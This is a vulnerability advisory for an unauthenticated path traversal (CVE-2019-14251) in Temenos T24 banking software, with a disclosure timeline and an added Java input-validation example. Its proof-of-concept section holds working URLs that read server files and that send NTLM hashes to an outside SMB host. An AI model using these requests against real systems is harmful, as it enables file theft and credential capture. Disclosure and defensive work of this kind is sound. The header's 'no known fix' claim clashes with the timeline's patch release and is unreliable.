###############################################################
#
# Pre-Authenticated Path Traversal in "GetImage" Java servlet (cwe-36)
#
###############################################################
#
# Publication date: to be defined
#
# Author:
# Bourbon Jean-marie (@kmkz_security) - Hacknowledge
# jean-marie@hacknowledge.lu
#
# Product Homepage: https://www.temenos.com/en/solutions/transact/core-banking-software/
# Source code download: N/A
#
# Tested on :
# Version: Build Version R15.01
#
###############################################################
# Pre-Authenticated Path Traversal (cwe-36)
#
# CVSSv3 : 8.6 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)
# OVE ID: OVE-20190724-0001
# CVE ID: CVE-2019-14251
#
###############################################################
# Fixes:
# No known available fix yet
###############################################################
I. PRODUCT
TEMENOS T24 is the most technically advanced banking system available today.
It combines the most comprehensive and flexible business functionality with the most advanced and scalable architecture.
This gives it unprecedented power to meet the challenges of today and the opportunities of tomorrow.
II. ADVISORY
An unauthenticated path traversal vulnerability was discovered that permits an attacker to exfiltrate data directly from the
T24 web server.
Using this weakness, an attacker could download any file, including sensitive files containing credentials (mgmt-users.properties), or
use it to exfiltrate NTLM hashes through an SMB query to an attacker-controlled server in order to compromise it.
III. VULNERABILITY DESCRIPTION
The login page exposes a JavaScript function that calls a servlet intended to give access to documents on the server once the user is successfully authenticated (in theory).
This weakness allows attackers to traverse the file system and access files or directories that are outside of the restricted directory.
As shown below, "downloadDocServer()" reveals that the "GetImage" Java servlet takes an unvalidated parameter to locate the document to download; a malicious person can use it to access arbitrary files through path traversal without
needing to be authenticated to the T24 application.
function downloadDocServer()
{
    pdfDownloadPath = escape(unescapeString(""));
    pdfDownloadLocation = escape(unescapeString(""));
    try
    {
        // the path used below is vulnerable to CWE-36 (path traversal) vulnerability permitting to extract NTLM hashes or access any file on the server's filesystem
        openWindow=window.open('/WealthT24/GetImage?docDownloadPath='+pdfDownloadPath+'&uploadLocation='+pdfDownloadLocation+'','RafPrintWin',type="application/pdf",'toolbar=0,location=0,left=100,top=100,width=800,height=800');
        openWindow.focus();
    }
    catch (e)
    {
        alert("Either popup blocker is enabled or file cannot be downloaded for viewing at this moment.");
    }
}
IV. PROOF OF CONCEPT
a) File accessing: http://T24BankingApplication/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini
b) NTLM hashes extraction: http://T24BankingApplication/WealthT24/GetImage?docDownloadPath=\\192.168.19.135\test
V. RECOMMENDATIONS
The application should validate the user input before processing it.
Ideally, the validation should compare against a white-list of permitted values.
If that isn't possible for the required functionality, then the validation should verify that the input contains only permitted content, such as purely alphanumeric characters.
After validating the supplied input, the application should append the input to the base directory and use a platform filesystem API to canonicalize the path.
It should verify that the canonicalized path starts with the expected base directory.
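The validation chain described in the recommendations above, written out as an added Java example (this is not Temenos code and not the GetImage servlet's actual implementation). It assumes a single fixed base directory for documents (the /var/t24/documents path is a placeholder), an allow-list that accepts only a bare file name, and that the caller is whatever handles the docDownloadPath request parameter; the class and method names are hypothetical.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.regex.Pattern;

// Added example, not the product's code: allow-list the requested name,
// append it to the base directory, canonicalize, then confirm the result
// still lies under the base directory.
public final class SafeDocumentPath {

    // Assumption: all downloadable documents live under one fixed directory.
    private static final Path BASE_DIR =
        Paths.get("/var/t24/documents").toAbsolutePath().normalize();

    // Allow-list: a plain file name with an optional extension. No path
    // separators, no drive letters, no UNC "\\host\share" prefixes.
    private static final Pattern SAFE_NAME =
        Pattern.compile("[A-Za-z0-9_-]+(\\.[A-Za-z0-9]+)?");

    private SafeDocumentPath() {}

    /** Returns the canonical path to serve, or throws if the request is rejected. */
    public static Path resolve(String requested) {
        // Step 1: allow-list check on the raw input before anything touches the filesystem.
        if (requested == null || !SAFE_NAME.matcher(requested).matches()) {
            throw new IllegalArgumentException("rejected by allow-list: " + requested);
        }
        // Step 2: append to the base directory and canonicalize with the platform API.
        // Path.resolve() returns the child unchanged if it is absolute, which is
        // exactly why the prefix check in step 3 must not be skipped.
        Path candidate = BASE_DIR.resolve(requested).toAbsolutePath().normalize();
        // Step 3: the canonical path must start with the expected base directory.
        if (!candidate.startsWith(BASE_DIR)) {
            throw new IllegalArgumentException("escapes base directory: " + requested);
        }
        return candidate;
    }

    public static void main(String[] args) {
        // Constructed inputs: one legitimate name plus the shapes the advisory's
        // proof of concept uses, all of which must be rejected.
        String[] inputs = {
            "statement_2019.pdf",        // accepted
            "../../etc/passwd",          // rejected: separators fail the allow-list
            "c:/windows/win.ini",        // rejected: drive letter and separators
            "\\\\192.168.19.135\\test",  // rejected: UNC share, would trigger SMB egress
        };
        for (String in : inputs) {
            try {
                System.out.println("ACCEPT " + in + " -> " + resolve(in));
            } catch (IllegalArgumentException e) {
                System.out.println("REJECT " + in + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

The allow-list alone already rejects every traversal and UNC form, so the prefix check in step 3 is defense in depth; keep both, because the regex is the part most likely to be loosened later. For files that must exist, `toRealPath()` can replace `toAbsolutePath().normalize()` so that symbolic links inside the base directory are also resolved before the prefix comparison.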
VI. TIMELINE
July 23rd, 2019: Vulnerability identification
July 24th, 2019: First contact with the editor (TEMENOS Team)
July 25th, 2019: CVE attribution
July 29th, 2019: Vulnerability acknowledgement + fix release from Temenos
August 1st, 2019: Patch released to customers
August 12th, 2019: First advisory released
August 19th, 2019: Temenos asked for removal of the publication
September 4th, 2019: Temenos informed that the responsible disclosure period (45 days) would expire the next day
December 5th, 2019: Advisory released
VII. LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this advisory.